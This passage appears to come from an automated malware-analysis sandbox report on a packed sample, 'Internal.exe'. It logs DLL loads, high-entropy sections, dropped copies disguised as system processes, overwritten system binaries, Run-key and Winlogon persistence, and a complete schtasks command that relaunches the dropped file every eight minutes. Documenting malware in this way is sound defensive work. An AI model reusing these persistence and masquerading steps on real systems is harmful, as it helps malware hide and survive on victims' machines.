                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: wldp.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: profapi.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: mscoree.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: version.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: uxtheme.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: windows.storage.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: wldp.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: profapi.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptsp.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: rsaenh.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptbase.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: sspicli.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: mscoree.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: version.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: uxtheme.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: windows.storage.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: wldp.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: profapi.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptsp.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: rsaenh.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: cryptbase.dll
                                    Source: C:\Blockcomcrt\AgentMonitor.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: apphelp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: version.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: sspicli.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: version.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\csrss.exeSection loaded: sspicli.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: mscoree.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: version.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: uxtheme.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: windows.storage.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: wldp.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: profapi.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: cryptsp.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: rsaenh.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: cryptbase.dll
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\Internal.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                    Source: Window Recorder Window detected: More than 3 window changes detected
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: Internal.exe Static file information: File size 3265288 > 1048576
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Internal.exe, Internal.exe, 00000001.00000002.1429730056.00000000004F1000.00000040.00000001.01000000.00000003.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.pdb source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: 8C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.pdb source: AgentMonitor.exe, 00000006.00000002.1759873239.00000000031DA000.00000004.00000800.00020000.00000000.sdmp

                                    Data Obfuscation

                                    Source: C:\Users\user\Desktop\Internal.exe Unpacked PE file: 1.2.Internal.exe.4f0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yoszi2zi\yoszi2zi.cmdline"
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ffrxwzu\1ffrxwzu.cmdline"
                                    Source: C:\Users\user\Desktop\Internal.exe File created: C:\Blockcomcrt\__tmp_rar_sfx_access_check_4728968
                                    Source: Internal.exe Static PE information: section name:
                                    Source: Internal.exe Static PE information: section name:
                                    Source: Internal.exe Static PE information: section name:
                                    Source: Internal.exe Static PE information: section name:
                                    Source: Internal.exe Static PE information: section name:
                                    Source: Internal.exe Static PE information: section name:
                                    Source: Internal.exe Static PE information: section name:
                                    Source: Internal.exe Static PE information: section name: cheat
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_005281CD push esi; ret 1_2_005281D6
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0050F640 push ecx; ret 1_2_0050F653
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0050EB78 push eax; ret 1_2_0050EB96
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_00583104 push ecx; mov dword ptr [esp], edx 1_2_00583109
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0058719C push ecx; mov dword ptr [esp], edx 1_2_0058719E
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0057728C push 005776D8h; ret 1_2_005776D0
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0058332C push ecx; mov dword ptr [esp], edx 1_2_00583331
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0056F3EA push 0056F418h; ret 1_2_0056F410
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_005803A0 push 00580400h; ret 1_2_005803F8
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0056F45C push 0056F488h; ret 1_2_0056F480
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_00581454 push 005814A1h; ret 1_2_00581499
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_00580456 push 005805A4h; ret 1_2_0058059C
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_00583448 push ecx; mov dword ptr [esp], edx 1_2_0058344D
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0058D40C push ecx; mov dword ptr [esp], edx 1_2_0058D411
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0056F424 push 0056F450h; ret 1_2_0056F448
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0056F4F8 push 0056F52Ch; ret 1_2_0056F524
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0056F494 push 0056F4C0h; ret 1_2_0056F4B8
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0058348C push ecx; mov dword ptr [esp], edx 1_2_00583491
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0058554C push ecx; mov dword ptr [esp], edx 1_2_0058554D
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0057F536 push 0057F5B5h; ret 1_2_0057F5AD
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0056D5F0 push 0056D641h; ret 1_2_0056D639
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0057E62C push 0057E6A2h; ret 1_2_0057E69A
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_005776DA push 0057774Bh; ret 1_2_00577743
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_00580684 push ecx; mov dword ptr [esp], ecx 1_2_00580687
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0057E6A4 push 0057E74Ch; ret 1_2_0057E744
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0057E74E push 0057E79Ch; ret 1_2_0057E794
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0057785E push 0057788Ch; ret 1_2_00577884
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0057F804 push 0057F830h; ret 1_2_0057F828
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_005808F4 push ecx; mov dword ptr [esp], ecx 1_2_005808F6
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0056D8AA push 0056D8D8h; ret 1_2_0056D8D0
                                    Source: C:\Users\user\Desktop\Internal.exe Code function: 1_2_0056D968 push 0056D994h; ret 1_2_0056D98C
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.996505494911121
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.981611898607139
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.46576892235659
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.944368858176558
                                    Source: Internal.exeStatic PE information: section name: entropy: 7.8489874697458575
                                    Source: Internal.exeStatic PE information: section name: cheat entropy: 7.977472810285237
                                    Source: AgentMonitor.exe.1.drStatic PE information: section name: .text entropy: 7.553181874650681
                                    Source: yxeaYbTPMzNPCanFqSswYWhX.exe.6.drStatic PE information: section name: .text entropy: 7.553181874650681
                                    Source: StartMenuExperienceHost.exe.6.drStatic PE information: section name: .text entropy: 7.553181874650681
                                    Source: csrss.exe.6.drStatic PE information: section name: .text entropy: 7.553181874650681
                                    Source: WmiPrvSE.exe.6.drStatic PE information: section name: .text entropy: 7.553181874650681

                                    Persistence and Installation Behavior

                                    Source: C:\Blockcomcrt\AgentMonitor.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Recovery\csrss.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Users\user\Desktop\wekqfedd.log
                                    Source: C:\Users\user\Desktop\Internal.exe File created: C:\Blockcomcrt\AgentMonitor.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe File created: C:\Users\user\Desktop\ZcxEZvOD.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Blockcomcrt\WmiPrvSE.exe
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Users\user\Desktop\cQVCqZDT.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Users\user\Desktop\UjoVbfCg.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe File created: C:\Users\user\Desktop\bQCMLIKB.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Users\user\Desktop\WuLVbyih.log
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe File created: C:\Users\user\Desktop\Vmjnufha.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe File created: C:\Users\user\Desktop\RypOpByW.log
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Source: C:\Blockcomcrt\AgentMonitor.exe File created: C:\Users\user\Desktop\fXTLLrxO.log
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe File created: C:\Users\user\Desktop\mVSSSdRf.log

                                    Boot Survival

                                    Source: C:\Blockcomcrt\AgentMonitor.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AgentMonitor
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run yxeaYbTPMzNPCanFqSswYWhX
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run csrss
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run StartMenuExperienceHost
                                    Source: C:\Users\user\Desktop\Internal.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
